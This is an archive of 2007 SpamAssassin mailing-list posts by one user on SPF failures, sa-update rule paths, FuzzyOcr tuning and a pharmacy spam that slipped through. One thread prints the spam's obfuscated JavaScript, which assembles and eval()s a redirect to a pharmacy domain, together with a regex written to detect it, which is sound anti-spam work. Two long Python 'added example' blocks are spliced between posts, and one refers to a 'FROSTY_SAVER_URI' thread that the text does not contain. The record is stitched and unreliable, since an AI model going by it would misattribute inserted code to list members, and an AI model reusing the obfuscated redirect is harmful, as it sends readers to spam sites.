Content analysis details:   (6.5 points, 6.0 required)

 0.1 cust_LOCAL_TO_RCVD Found Received: after the To:
 0.0 RM_hc_HTML Email is text/html format
-0.0 PH_TO_PAULH Has Paul.Hurley@ in To:
 1.4 SPF_SOFTFAIL SPF: sender does not match SPF record (softfail)
[SPF failed: Please see http://spf.pobox.com/why.html?sender=newscientistjobs%40email.newscientist.com&ip=172.20.8.86&receiver=casseopia]
 0.5 DATE_IN_PAST_03_06 Date: is 3 to 6 hours before Received: date
 0.1 PH_BODY_LERA BODY: Body contains a gappy version of 'le..ra'
 0.1 HTML_MESSAGE BODY: HTML included in message
 0.0 BAYES_50 BODY: Bayesian spam probability is 40 to 60%
[score: 0.5000]
 0.0 MIME_HTML_ONLY BODY: Message only has text/html MIME parts
 0.0 RM_rb_ANCHOR RAW: Testing for HTML end of anchor in emails
 0.0 RM_rb_TITLE RAW: Testing for HTML title in emails
 0.0 RM_rb_HTML RAW: Testing for HTML tag in emails
 0.0 RM_rb_BREAK RAW: Testing for HTML Break in emails
 0.0 RM_rb_FONT RAW: Testing for HTML Font tag in emails
 0.0 RM_rb_PARA RAW: Testing for HTML Paragraph in emails
 4.0 DCC_CHECK Listed in DCC (http://rhyolite.com/anti-spam/dcc/)
 0.2 DNS_FROM_RFC_ABUSE RBL: Envelope sender in abuse.rfc-ignorant.org
 0.1 AWL AWL: From: address is in the auto white-list


The original message was not completely plain text and may be unsafe to
open with some email clients; in particular, it may contain a virus
or confirm that your address can receive spam.  If you wish to view
it, it may be safer to save it to a file and open it with an editor.




Subject:
Employers of choice
From:
"New Scientist Jobs"<[EMAIL PROTECTED]>
Date:
Mon, 12 Mar 2007 14:18:24 + (GMT)
To:
[EMAIL PROTECTED]
To:
[EMAIL PROTECTED]
Delivered-To:
[EMAIL PROTECTED]
Received:
(qmail 29777 invoked from network); 12 Mar 2007 18:31:30 -
Received:
from smtp-a02.internal.boltblue.com (HELO smtp.boltblue.com)  
([172.20.8.86]) (envelope-sender  
<[EMAIL PROTECTED]>) by  
bblite.backend.boltblue.com (qmail-ldap-1.03) with SMTP for  
<[EMAIL PROTECTED]>; 12 Mar 2007 18:31:30 -

Received:
(qmail 92833 invoked from network); 12 Mar 2007 17:22:47 -
Received:
from unknown (HELO mta1.primary.edc.dartmail.net) (216.73.95.131)  
by smtp-a02.boltblue.com with SMTP; 12 Mar 2007 17:22:47 -

Message-ID:
<[EMAIL PROTECTED]>







Unless you manage DNS for newscientist.com then you're SOL.  SPF has to deal
with verifying that the sending party's IP address is authorized to send
email from that particular domain (newscientist.com) and does not have to do
anything with your domain or domains that forward to your email address
unless you are sending the message.  Click the link where SPF failed and
read.


-B

Re: Can't Locate Tie/Handle.pm

2007-03-16 Thread Brian Wilson

On Fri, 16 Mar 2007, John D. Hardin wrote:


On Fri, 16 Mar 2007, Marc Perkel wrote:


Getting this error:

Can't Locate Tie/Handle.pm

Where do I find this and how do you figure out where to find it?


...doesn't the SA documentation or wiki have a list of required
CPAN dependencies somewhere in the installation instructions?



The INSTALL file covers this does it not?

Required Perl Modules
-

In addition to the modules associated with Perl, some additional modules
need to be installed or upgraded depending on the version of Perl that you
are running.

You can get an immediate report on which of these modules you may need (or
want) to upgrade, by running "perl build/check_dependencies" from the
SpamAssassin build directory.

...

Optional Modules

...




Re: Low Scoring Message

2007-03-14 Thread Brian Wilson


On Mar 14, 2007, at 7:08 PM, Daryl C. W. O'Shea wrote:


Brian Wilson wrote:

On Wed, 14 Mar 2007, John D. Hardin wrote:

On Wed, 14 Mar 2007, Daryl C. W. O'Shea wrote:


Anyway... this is the redirect code they're using:

   
 yvxj = "ef=";kacm = "ttp://";apgy = "fe";ioo = "'h";usf =
"ershikin";uos = ".";iaswx = "inj";bdj = "com'";rpul = "l";fgbww =
"nhu";wnx = "ocation.
hr";jftrg = rpul + wnx + yvxj + ioo + kacm + apgy + fgbww + iaswx + usf
+ uos + bdj; eval(jftrg); 
   


Quick and dirty, a regex that would work for a Web-Redirect header rule:


  /( \+ [a-z]{1,6}){4}; eval\([a-z]{1,6}\); <\/script>/


How about a much simpler rule that just adds 100 points for any mail
with a 

Re: Low Scoring Message

2007-03-14 Thread Brian Wilson

On Wed, 14 Mar 2007, John D. Hardin wrote:


On Wed, 14 Mar 2007, Daryl C. W. O'Shea wrote:


Anyway... this is the redirect code they're using:

   
 yvxj = "ef=";kacm = "ttp://";apgy = "fe";ioo = "'h";usf =
"ershikin";uos = ".";iaswx = "inj";bdj = "com'";rpul = "l";fgbww =
"nhu";wnx = "ocation.
hr";jftrg = rpul + wnx + yvxj + ioo + kacm + apgy + fgbww + iaswx + usf
+ uos + bdj; eval(jftrg); 
   


Quick and dirty, a regex that would work for a Web-Redirect header rule:

  /( \+ [a-z]{1,6}){4}; eval\([a-z]{1,6}\); <\/script>/


How about a much simpler rule that just adds 100 points for any mail
with a 
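
An added example (not code from any post in this archive) that runs the two hand-written patterns quoted on this list, the FROSTY_SAVER_URI rule from the aero-dog thread above and John Hardin's eval() redirect pattern here, against constructed samples using Python's re module (close enough to Perl for these two patterns), and statically rebuilds the concatenated string so the redirect target can be read without executing the script. The sample URIs, the sample script, the helper regexes and the placeholder domain example.invalid are all constructed for this example.

```python
"""Added example, not from any post in this archive: try the two hand-written
regexes quoted in this list (FROSTY_SAVER_URI and the eval() concat pattern)
on constructed samples and statically resolve the string concatenation."""
import re

# uri FROSTY_SAVER_URI /^http\:\/\/[\S\-]+\/[\d\-]+.html/  as posted.
# Two things to notice: the '.' before html is unescaped, and [\S\-]+ also
# swallows '/' characters, so the digits-and-dashes part only has to be the
# last path component, not the whole path.
FROSTY_SAVER_URI = re.compile(r"^http://[\S\-]+/[\d\-]+.html")

# John Hardin's quick-and-dirty rule for the concatenate-then-eval redirect:
# four " + name" terms, a ';', eval(name); and the closing script tag.
EVAL_CONCAT = re.compile(r"( \+ [a-z]{1,6}){4}; eval\([a-z]{1,6}\); </script>")

# Constructed URIs (placeholder host) showing what the rule does and does not hit.
SAMPLE_URIS = [
    "http://example.com/1-23-28276-45381123.html",  # shape of the spam URL in the thread
    "http://example.com/docs/2007-09-12.html",      # legitimate date-named page: also hits
    "http://example.com/123xhtml",                  # unescaped '.' lets this hit too
    "http://example.com/page.html",                 # no digits in the last component: no hit
    "https://example.com/1-2-3.html",               # anchored on http://, so https is never hit
]

# Constructed script mirroring the structure of the redirect quoted in the
# thread, with the placeholder domain example.invalid instead of the real one.
SAMPLE_SCRIPT = (
    'abc = "ef=";kd = "ttp://";pq = "ex";io = "\'h";us = "ample";'
    'uo = ".";ia = "inva";bd = "lid\'";rp = "l";fg = "ocation.";'
    'wn = "hr";jf = rp + fg + wn + abc + io + kd + pq + us + uo + ia + bd;'
    ' eval(jf); </script>'
)
# Constructed benign use of eval with no string building: the rule stays quiet.
BENIGN_SCRIPT = 'code = "1+1"; eval(code); </script>'


def frosty_hits(uris):
    """Return the URIs the posted uri rule would flag."""
    return [u for u in uris if FROSTY_SAVER_URI.search(u)]


def eval_concat_hits(html):
    """True when John Hardin's pattern matches the message body."""
    return EVAL_CONCAT.search(html) is not None


# Helper regexes for the static resolver (hypothetical, not SA rules):
# `name = "literal";` and `name = a + b + c;` with the same short names
# the sample uses.
_LITERAL = re.compile(r'\b([a-z]{1,6})\s*=\s*"([^"]*)"\s*;')
_CONCAT = re.compile(r'\b([a-z]{1,6})\s*=\s*([a-z]{1,6}(?:\s*\+\s*[a-z]{1,6})+)\s*;')


def resolve_concat(script):
    """Rebuild every `x = a + b + ...;` from the string literals assigned in
    the same script. Nothing is executed; a name with no literal is kept as
    '<name>' so partial resolution still shows what was recoverable."""
    literals = dict(_LITERAL.findall(script))
    resolved = {}
    for name, expr in _CONCAT.findall(script):
        parts = [p.strip() for p in expr.split("+")]
        resolved[name] = "".join(literals.get(p, f"<{p}>") for p in parts)
    return resolved


if __name__ == "__main__":
    print("FROSTY_SAVER_URI hits:", frosty_hits(SAMPLE_URIS))
    print("eval pattern on sample:", eval_concat_hits(SAMPLE_SCRIPT))
    print("eval pattern on benign:", eval_concat_hits(BENIGN_SCRIPT))
    print("resolved:", resolve_concat(SAMPLE_SCRIPT))
```

The second and third sample URIs are the false positives to weigh before giving FROSTY_SAVER_URI a score of 10 on a real mail stream.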

Re: Low Scoring Message

2007-03-14 Thread Brian Wilson

On Wed, 14 Mar 2007, Daryl C. W. O'Shea wrote:


Brian Wilson wrote:


Ok, I've got one; apparently from a gmail user to my gmail account, then 
forwarded to an external account.   The html links go to a blogspot.com 
site, then redirect to some Pharmacy Express site.


Raw Message: http://bubba.org/spam/spam_lowscore.txt
Message renders like this: http://bubba.org/spam/spam_lowscore.jpg

X-Spam-Status: No, score=-0.5 required=4.5 tests=BAYES_50,HTML_MESSAGE,
SPF_PASS autolearn=no version=3.1.8
X-Spam-Report:
* -0.5 SPF_PASS SPF: sender matches SPF record
*  0.0 HTML_MESSAGE BODY: HTML included in message
*  0.0 BAYES_50 BODY: Bayesian spam probability is 40 to 60%
*  [score: 0.4641]

Any ideas for detecting these?


The WebRedirect plugin will help (if you add *.blogspot.com to the list of 
domains it's supposed to check).


Daryl




I installed the plugin, added *.blogspot.com to the list, and the plugin 
didn't flag anything for this particular message.


[13718] dbg: plugin: Mail::SpamAssassin::Plugin::WebRedirect=HASH(0x8f54e7c) implements 
'parsed_metadata'

[13718] dbg: uri: html uri found, http://osmmehaaranrev.blogspot.com/
[13718] dbg: uri: cleaned html uri, http://osmmehaaranrev.blogspot.com/
[13718] dbg: uri: html domain, blogspot.com
[13718] dbg: uri: parsed uri found, http://osmmehaaranrev.blogspot.com/
[13718] dbg: uri: parsed domain, blogspot.com
[13718] dbg: uridnsbl: domain blogspot.com in skip list
[13718] dbg: uridnsbl: domains to query:
[13718] dbg: rules: hostname: osmmehaaranrev.blogspot.com matches check pattern: *.blogspot.com
[13718] dbg: rules: checking uri: http://osmmehaaranrev.blogspot.com/
[13718] dbg: rules: request status: 200 OK
[13718] dbg: rules: got response to request in 0.813493 seconds
[13718] dbg: rules: _decode_page() iteration 0
[13718] dbg: rules: WebRedirect page text: start>>

[13718] dbg: rules: WebRedirect decoded text: start>><

Low Scoring Message

2007-03-14 Thread Brian Wilson


Ok, I've got one; apparently from a gmail user to my gmail account, then 
forwarded from my gmail account to an external account.   The html links 
go to a blogspot.com site, then redirect to some Pharmacy Express site.


Raw Message: http://bubba.org/spam/spam_lowscore.txt
Message renders like this: http://bubba.org/spam/spam_lowscore.jpg

X-Spam-Status: No, score=-0.5 required=4.5 tests=BAYES_50,HTML_MESSAGE,
SPF_PASS autolearn=no version=3.1.8
X-Spam-Report:
* -0.5 SPF_PASS SPF: sender matches SPF record
*  0.0 HTML_MESSAGE BODY: HTML included in message
*  0.0 BAYES_50 BODY: Bayesian spam probability is 40 to 60%
*  [score: 0.4641]

Any ideas for detecting these?
-B


Re: Low Scoring Message

2007-03-13 Thread Brian Wilson


Ok, I've got one; apparently from a gmail user to my gmail account,  
then forwarded to an external account.   The html links go to a  
blogspot.com site, then redirect to some Pharmacy Express site.


Raw Message: http://bubba.org/spam/spam_lowscore.txt
Message renders like this: http://bubba.org/spam/spam_lowscore.jpg

X-Spam-Status: No, score=-0.5 required=4.5 tests=BAYES_50,HTML_MESSAGE,
SPF_PASS autolearn=no version=3.1.8
X-Spam-Report:
* -0.5 SPF_PASS SPF: sender matches SPF record
*  0.0 HTML_MESSAGE BODY: HTML included in message
*  0.0 BAYES_50 BODY: Bayesian spam probability is 40 to 60%
*  [score: 0.4641]

Any ideas for detecting these?
-B


Re: Sorting SA Discussion List Messages

2007-03-03 Thread Brian Wilson


On Mar 3, 2007, at 4:41 PM, Mário Gamito wrote:


Don Ireland wrote:
Every email list I've ever subscribed to has had something in the subject
line (usually in square brackets) to identify 1) that it is a mailing list
and 2) what list it is.

Maybe, just maybe, you can filter through e-mail addresses instead of
subjects.


-- Mário Gamito


This works until someone's reply to your posting is sent directly to you
instead of to the mailing list.  In order for the reply to be threaded
properly with other messages in the thread, it needs to be put into the same
folder.  An easy way to direct it to a folder is basing your rules off some
characteristic that the message originally had (i.e. the subject).  I tend to
agree that it would be nice if the mailing list had a subject prefix like
most other mailing lists.  If not to sort mail, at least to be able to
categorize it mentally should you not classify your mail into folders.


-B 
 

Re: Using sa-learn and fetchmail

2007-02-27 Thread Brian Wilson


On Feb 27, 2007, at 5:59 AM, Matthew Bickerton wrote:


Hi all,

As described in the SA wiki, I have set up fetchmail to read a mail folder
in to sa-learn. However I get the following error:

/usr/local/bin/fetchmail -a -s -n --uidl --keep --folder LearnAsSpam -m
'/usr/local/bin/sa-learn --spam'
archive-iterator: invalid (undef) format in target list, 2 at
/usr/local/lib/perl5/site_perl/5.8.8/Mail/SpamAssassin/ArchiveIterator.pm
line 724,  line 1.
Learned tokens from 0 message(s) (1 message(s) examined)




If I try reading the mail box directly with :


/usr/local/bin/sa-learn --spam --mbox $HOME/mail/LearnAsSpam

Learned tokens from 0 message(s) (2 message(s) examined)




It works fine.

I am using SpamAssassin version 3.1.8. Has anybody a suggestion?

Thanks

Matthew



Bug and proposed patch here:  https://issues.apache.org/SpamAssassin/show_bug.cgi?id=5336


The patch works fine for me.

-B


Re: how to start using sa-update

2007-02-25 Thread Brian Wilson


On Feb 25, 2007, at 3:24 PM, John Fleming wrote:



- Original Message - From: "David Goldsmith"  
<[EMAIL PROTECTED]>

To: "Bram Mertens" <[EMAIL PROTECTED]>
Cc: 
Sent: Sunday, February 25, 2007 2:10 PM
Subject: Re: how to start using sa-update




Bram Mertens wrote:


Hi

I unsubscribed from this list in December 2004 since SA was working fine for me and I couldn't keep up with the volume on this list.

Lately however the number of SPAM messages getting through is increasing rapidly so I could use some help.

Currently I'm running SpamAssassin version 3.1.7-deb (running on Perl version 5.8.8) on Debian Etch, without RDJ or any other tool to update my rules.

While checking the archives and the wiki I learned of the new sa-update tool and it appears to be very interesting.  Unfortunately I (apparently like several others) am struggling to understand where to put the various rules.

Right now I have:
* the SA "default" rules - meaning the rules distributed by SA in /usr/share/spamassassin
* Some of the SARE rules and a rule I wrote myself in /etc/spamassassin


Sa-update will create a /var/lib/spamassassin/3. folder containing the various rules downloaded from the various channels.

What I don't understand (and I have read quite a few messages about this topic in the archives) is whether this new directory replaces one of the above or not.  Put differently: will the (currently outdated) rules in /etc/spamassassin and my own rule in that same directory still be used or should I move the ones I still need to some other directory?  If so which one?

Thanks in advance

Bram



SA 3.1.x will look for rules in /usr/share/spamassassin, /var/lib/spamassassin and /etc/mail/spamassassin.  The last definition of any rule wins.

So your default version of the core rules is in /usr/share/spamassassin and if you use sa-update, then you will have newer versions of these rules under /var/lib/spamassassin/3.xx/updates_spamassassin_org*

If you use sa-update to download the SARE rulesets (one source is
http://saupdates.openprotect.com/), then you would also have
/var/lib/spamassassin/3.xx/saupdates_openprotect_org* with the
latest SARE rules.

If you do this, you can delete any SARE rulesets from your /etc/mail/spamassassin directory (70_sare_*, 99_sare_*)

Any local rulesets you create, or modifications to core/SARE rules,
should go in files in /etc/mail/spamassassin.

David Goldsmith



Thanks for the Q&A!  Now, is there any functional difference between using sa-update in this way and using RDJ to get the SARE rules?  (I'm using RDJ right now, so what would I gain by changing to sa-update with a SARE channel?)  Thanks!  - John





Yes, use Daryl's SARE update channels (http://daryl.dostech.ca/sa-update/sare/sare-sa-update-howto.txt).  RDJ is old and busted.  If Daryl would add KAM.cf I'd be in business *hint hint* :)


-B
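The "last definition wins" rule David describes, worked through as an added example (not code from this thread or from the SpamAssassin project): it walks the three directories in the order he gives, parses the `score` lines in each `*.cf` file, and reports which file ended up setting each rule's score, so a local override in /etc/mail/spamassassin can be confirmed rather than assumed. Directory names, file names and scores are constructed samples; the sa-update directory name under /var/lib/spamassassin is an assumed placeholder for the "3.xx" in David's reply.

```python
"""Which copy of a SpamAssassin rule definition wins?

Added example, not from the thread or the SpamAssassin project. It walks
the load order described in the thread (default rules, then the sa-update
state directory, then /etc/mail/spamassassin; last definition wins) over
constructed in-memory rule files and reports the effective score of each
rule and which file set it. Only the first score on a "score" line is
considered.
"""
import re

SCORE_RE = re.compile(r"^\s*score\s+(\S+)\s+(-?\d+(?:\.\d+)?)")

# Load order as described in the thread; paths and contents are constructed.
RULE_DIRS = [
    ("/usr/share/spamassassin", {
        "50_scores.cf": "score BAYES_99 3.5\nscore HTML_MESSAGE 0.001\nscore OLD_DEFAULT_ONLY 1.0\n",
    }),
    ("/var/lib/spamassassin/3.001007/updates_spamassassin_org", {
        "50_scores.cf": "score BAYES_99 4.2\nscore HTML_MESSAGE 0.001\n",
    }),
    ("/etc/mail/spamassassin", {
        "70_sare_stocks.cf": "score SARE_PROLOSTOCK_SYM3 1.7\n",
        "local.cf": "score BAYES_99 5.0\nscore SARE_PROLOSTOCK_SYM3 2.5\n",
    }),
]


def effective_scores(rule_dirs, updates_replace_default=True):
    """Return {rule: (score, "dir/file")} after last-definition-wins.

    With updates_replace_default=True the default /usr/share directory is
    skipped whenever an updates_spamassassin_org directory is present,
    matching how the sa-update documentation describes its output: used
    in preference to the default rules rather than layered on top of them.
    """
    dirs = list(rule_dirs)
    if updates_replace_default and any("updates_spamassassin_org" in d for d, _ in dirs):
        dirs = [(d, f) for d, f in dirs if not d.startswith("/usr/share/")]
    winners = {}
    for directory, files in dirs:
        for fname in sorted(files):  # *.cf files are read in sorted order
            for line in files[fname].splitlines():
                m = SCORE_RE.match(line)
                if m:
                    winners[m.group(1)] = (float(m.group(2)), f"{directory}/{fname}")
    return winners


def explain(rule_dirs):
    """Human-readable summary, one line per rule."""
    return [f"{rule:<22} {score:>6} from {src}"
            for rule, (score, src) in sorted(effective_scores(rule_dirs).items())]


if __name__ == "__main__":
    print("\n".join(explain(RULE_DIRS)))
```

Running it shows BAYES_99 taken from local.cf even though both the default and the update directory define it, and SARE_PROLOSTOCK_SYM3 from local.cf rather than 70_sare_stocks.cf because local.cf sorts later within the same directory. Passing `updates_replace_default=False` brings OLD_DEFAULT_ONLY back, which is the difference between layering the directories and letting the update directory stand in for the default one.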






Re: Crooked JPG's not being recognized by FuzzyOCR?

2007-02-25 Thread Brian Wilson


On Feb 25, 2007, at 2:29 PM, David Goldsmith wrote:



Ok, I had a permissions issue on some of the FuzzyOCR files so it
couldn't properly parse it.  Now that the permissions are fixed, my
system is catching that image.

SA results are:

X-Spam-Report:
* -1.4 ALL_TRUSTED Passed through trusted hosts only via SMTP
*  5.0 FUZZY_OCR BODY: Mail contains an image with common spam text inside
*  Words found:
*  "target" in 1 lines
*  "target" in 1 lines
*  (2 word occurrences found)
* -1.9 AWL AWL: From: address is in the auto white-list

FuzzyOCR flagged it, it just didn't get blocked since it was from me to me and only went through internal servers, there were some negative offsets.




I have received the same spam message (my copy: http://bubba.org/spam/imagespam13.txt) and FuzzyOcr seems to pick it up fine, but it would have still been flagged as spam with other checks.


[12518] info: FuzzyOcr: Scanset "ocrad" found word "target" with fuzz of 0.
[12518] info: FuzzyOcr: line: " target kt ss"
[12518] info: FuzzyOcr: Scanset "ocrad" found word "company" with fuzz of 0.1429
[12518] info: FuzzyOcr: line: "companrirwin resources inc c oder otc i w r s p k "
[12518] dbg: FuzzyOcr: Not enough OCR Hits without space stripping, doing second matching pass...
[12518] info: FuzzyOcr: Scanset "ocrad" found word "target" with fuzz of 0.
[12518] info: FuzzyOcr: line: "targetktss"
[12518] info: FuzzyOcr: Scanset "ocrad" found word "company" with fuzz of 0.1429
[12518] info: FuzzyOcr: line: "companrirwinresourcesinccoderotciwrspk"
[12518] info: FuzzyOcr: Scanset "ocrad" generates enough hits (4), skipping further scansets...


*  6.0 FUZZY_OCR BODY: Mail contains an image with common spam text inside
*  Words found:
*  "target" in 1 lines
*  "company" in 1 lines
*  "target" in 1 lines
*  "company" in 1 lines

-B







Re: FuzzyOcr - how do I "teach" it?

2007-02-24 Thread Brian Wilson


On Feb 20, 2007, at 6:36 PM, Robert S wrote:


I have just installed FOCR 3.5.1 with the hashdb option.  I have been
receiving image spams about China Fruits Corporation which are
cleverly designed not to contain words in the words list.  How do I
insert the hash into the database and label this image as spam?

I have tried - unsuccessfully:

fuzzy-find --score=10 --learn-spam --verbose "367563:437:282:32::49:1:18:17:55642::44:40:7:37:54950::218:144:172:169:1131::96:99:179:107:1094::100:122:122:115:1093::156:136:162:145:1066"

(I got the hash score from running "spamassassin -D < message")

and

fuzzy-find  --score=10 --learn-spam 'notary_public.gif'

I'd like to avoid tampering with the words list to avoid FPs.

Could somebody please tell me where I'm going wrong.

It would be nice if images could be automatically stored in the hashdb
as spam if SA gives them a positive score, but FOCR does not.


I have the same problem as you, so you are not alone.  I first deleted the hash using fuzzy-find to make sure it didn't exist in either hash, then added it with a score of 10.  I re-ran spamassassin with debug on for FuzzyOcr and it did not see the entry in the spam db.  I even compared the hashes and they were the same:

% fuzzy-find --delete 278502:292:319:128::203:248:219:231:26298::202:200:236:205:25148::247:249:185:241:16996::192:236:242:224:16482::136:34:15:62:630::108:30:158:68:410
Img =278502 292x319x128

% fuzzy-find --learn-spam 278502:292:319:128::203:248:219:231:26298::202:200:236:205:25148::247:249:185:241:16996::192:236:242:224:16482::136:34:15:62:630::108:30:158:68:410
Img =278502 292x319x128

Rerun the spam through SA (China Fruits also: http://bubba.org/spam/)

Adding key to database...
[1548] dbg: FuzzyOcr: Not enough OCR Hits without space stripping, doing second matching pass...
[1548] info: FuzzyOcr: Message is ham, saving...
[1548] info: FuzzyOcr: Adding Hash to "/etc/mail/spamassassin/FuzzyOcr.safe.db" with score "0"
[1548] dbg: FuzzyOcr: Digest: 278502:292:319:128::203:248:219:231:26298::202:200:236:205:25148::247:249:185:241:16996::192:236:242:224:16482::136:34:15:62:630::108:30:158:68:410


RE: FuzzyOcr image spam not getting scored

2007-02-23 Thread Brian Wilson

On Fri, 23 Feb 2007, Randal, Phil wrote:


Charming!

Being part of a large community on this mailing list, my answer was
addressing all readers and not just you.

So I included the extra info for those readers who scanned your email
and found low SA scores regardless.

What FuzzyOCR scanset did you use to catch those?

And which version of netpbm are you using?

Cheers,

Phil



I'm sure I confused lots of readers; those are obviously not the ones that 
would be of much assistance anyway. c'est la vie.


I'm running netpbm 10.35, tesseract 1.03, ocrad 0.16, gocr 0.43

[14276] info: FuzzyOcr: Scanset "ocrad" found word "stock" with fuzz of 0.2000
[14276] info: FuzzyOcr: Scanset "ocrad" found word "stock" with fuzz of 0.2000
[14276] info: FuzzyOcr: Scanset "gocr" found word "stock" with fuzz of 0.2000
[14276] info: FuzzyOcr: Scanset "gocr" found word "investor" with fuzz of 0.2500
[14276] info: FuzzyOcr: Scanset "gocr" found word "company" with fuzz of 0.2857
[14276] info: FuzzyOcr: Words found:
[14276] info: FuzzyOcr: (4.5 word occurrences found)

Reading another post about FPs with a threshold as high as .30, I have 
bumped it down to .25 and modified the wordlist on longer words that could 
benefit from a higher threshold.


-B


RE: FuzzyOcr image spam not getting scored

2007-02-23 Thread Brian Wilson

On Fri, 23 Feb 2007, Randal, Phil wrote:


I caught these by adding

corpo

to my FuzzyOCR.words file.

But you should also be running a bunch of SARE rules, and sa-updated
rulesets.



Wow, thanks for not reading my email or reading the scores in the message 
I posted.  As I originally noted, the message was already tagged as 
spam.


Also, big big thanks to snowcrash who actually helped me turn my 0 score 
to:


[12921] info: FuzzyOcr: Message is spam, score = 6.500
[12921] info: FuzzyOcr: Words found:
[12921] info: FuzzyOcr: "stock" in 1 lines
[12921] info: FuzzyOcr: "investor" in 1 lines
[12921] info: FuzzyOcr: "company" in 1 lines
[12921] info: FuzzyOcr: "alert" in 1 lines
[12921] info: FuzzyOcr: (6 word occurrences found)

Simply changing focr_threshold from 0.25 to 0.30 allowed this to happen.

Thanks again, snowcrash!

-B
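The two messages above (and the "Crooked JPG's" thread further up, where "company" was logged at fuzz 0.1429) all turn on what FuzzyOcr's fuzz threshold does. Here is an added example, not FuzzyOcr's own code, that reproduces the behaviour the logs show: the model that fuzz = edit distance divided by word length, matched against the closest substring of an OCR line, is an assumption inferred from the logged values (1/7 = 0.1429 and 2/7 = 0.2857 for "company", 1/5 = 0.2 for "stock", 2/8 = 0.25 for "investor"), and the second pass on space-stripped lines mirrors the "Not enough OCR Hits without space stripping" debug line. The word list and OCR lines are constructed to resemble the thread's ocrad output.

```python
"""Fuzzy OCR word matching with a tunable threshold, in the style of FuzzyOcr.

Added example, not FuzzyOcr's own code. Assumed model (inferred from the
fuzz values logged in the thread): fuzz = edit distance / len(word) over the
closest substring of an OCR line; a second pass on space-stripped lines
runs only when the first pass found too few words. OCR lines and the word
list are constructed samples.
"""

WORDS = ["target", "company", "stock", "investor", "alert"]

OCR_LINES = [  # constructed; not real scanner output
    "t a r g e t kt ss",                   # letters split by spaces
    "c0mpanr irwin resources inc c oder",  # "company" with two OCR errors
    "sto_k alert for inve5t0r",            # one and two OCR errors
]


def levenshtein(a, b):
    """Classic edit distance (insert, delete, substitute all cost 1)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def best_fuzz(word, line):
    """Lowest edit-distance/len(word) over substrings of roughly the word's length."""
    n = len(word)
    best = 1.0
    for start in range(len(line)):
        for length in (n - 1, n, n + 1):
            if length < 1 or start + length > len(line):
                continue
            best = min(best, levenshtein(word, line[start:start + length]) / n)
    return round(best, 4)


def scan(lines, words, threshold, counts_required=2):
    """Return ({word: best fuzz}, passes) for words whose fuzz is <= threshold.

    Pass 1 matches the lines as given; pass 2 (only if fewer than
    counts_required words were found) strips spaces first, which is what
    the "doing second matching pass" debug line in the thread refers to.
    """
    hits = {}
    passes = 0
    for strip_spaces in (False, True):
        passes += 1
        for line in lines:
            text = line.replace(" ", "") if strip_spaces else line
            for w in words:
                f = best_fuzz(w, text)
                if f <= threshold and f < hits.get(w, 2.0):
                    hits[w] = f
        if len(hits) >= counts_required:
            break
    return hits, passes


def demo():
    """Same OCR text at the two thresholds discussed in the thread."""
    return {t: scan(OCR_LINES, WORDS, t, counts_required=4) for t in (0.25, 0.30)}


if __name__ == "__main__":
    for threshold, (hits, passes) in demo().items():
        print(f"threshold {threshold}: {hits} after {passes} pass(es)")
```

At 0.25 the two-error "c0mpanr" (fuzz 0.2857) is rejected and the scanner has to fall back to the space-stripped pass to reach four words; at 0.30 "company" is accepted in the first pass and the second pass never runs. That is the trade-off both messages describe: a higher threshold finds more mangled words, and also makes a longer word like "company" match on two wrong characters, which is where the false-positive risk comes from.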


Re: Fwd: FuzzyOcr - how do I "teach" it?

2007-02-23 Thread Brian Wilson

On Fri, 23 Feb 2007, Jorge Valdes wrote:


Brian Wilson wrote:

On Feb 20, 2007, at 6:36 PM, Robert S wrote:


I have just installed FOCR 3.5.1 with the hashdb option.  I have been
receiving image spams about China Fruits Corporation which are
cleverly designed not to contain words in the words list.  How do I
insert the hash into the database and label this image as spam?

I have tried - unsuccessfully:

fuzzy-find --score=10 --learn-spam --verbose
"367563:437:282:32::49:1:18:17:55642::44:40:7:37:54950::218:144:172:169:1131::96:99:179:107:1094::100:122:122:115:1093::156:136:162:145:1066" 
(I got the hash score from running "spamassassin -D < message")


and

fuzzy-find  --score=10 --learn-spam 'notary_public.gif'

I'd like to avoid tampering with the words list to avoid FPs.

Could somebody please tell me where I'm going wrong.

It would be nice if images could be automatically stored in the hashdb
as spam if SA gives them a positive score, but FOCR does not.



I have the same problem as you, so you are not alone.  I first deleted the 
hash using fuzzy-find to make sure it didn't exist in either hash, then 
added it with a score of 10.  I re-ran spamassassin with debug on for 
FuzzyOcr and it did not see the entry in the spam db.  I even compared the 
hashes and they were the same:


% fuzzy-find --delete 
278502:292:319:128::203:248:219:231:26298::202:200:236:205:25148::247:249:185:241:16996::192:236:242:224:16482::136:34:15:62:630::108:30:158:68:410 
Img =278502 292x319x128


% fuzzy-find --learn-spam --score=10 
278502:292:319:128::203:248:219:231:26298::202:200:236:205:25148::247:249:185:241:16996::192:236:242:224:16482::136:34:15:62:630::108:30:158:68:410 
Img =278502 292x319x128


Rerun the spam  through SA (China Fruits also: http://bubba.org/spam/)

Adding key to database...
[1548] dbg: FuzzyOcr: Not enough OCR Hits without space stripping, doing second matching pass...

[1548] info: FuzzyOcr: Message is ham, saving...
[1548] info: FuzzyOcr: Adding Hash to "/etc/mail/spamassassin/FuzzyOcr.safe.db" with score "0"
[1548] dbg: FuzzyOcr: Digest: 278502:292:319:128::203:248:219:231:26298::202:200:236:205:25148::247:249:185:241:16996::192:236:242:224:16482::136:34:15:62:630::108:30:158:68:410




Remember that in order for things to work right, the safe database is checked 
first.  The rationale behind this is that if an image "fingerprint" is found 
here, there is no need to do OCR.  If you already have the image learned as 
HAM, you must delete it first, then optionally add it to the SPAM database.


Jorge.




Is that not what I did?  It's obvious to me that since it was learned as 
ham, it must be deleted before being reclassified as spam (which I did). 
Then I re-ran spamassassin and it was again tagged as ham, which it 
shouldn't be since I removed it from ham and reclassified it as spam.





Fwd: FuzzyOcr - how do I "teach" it?

2007-02-23 Thread Brian Wilson

On Feb 20, 2007, at 6:36 PM, Robert S wrote:


I have just installed FOCR 3.5.1 with the hashdb option.  I have been
receiving image spams about China Fruits Corporation which are
cleverly designed not to contain words in the words list.  How do I
insert the hash into the database and label this image as spam?

I have tried - unsuccessfully:

fuzzy-find --score=10 --learn-spam --verbose "367563:437:282:32::49:1:18:17:55642::44:40:7:37:54950::218:144:172:169:1131::96:99:179:107:1094::100:122:122:115:1093::156:136:162:145:1066"

(I got the hash score from running "spamassassin -D < message")

and

fuzzy-find  --score=10 --learn-spam 'notary_public.gif'

I'd like to avoid tampering with the words list to avoid FPs.

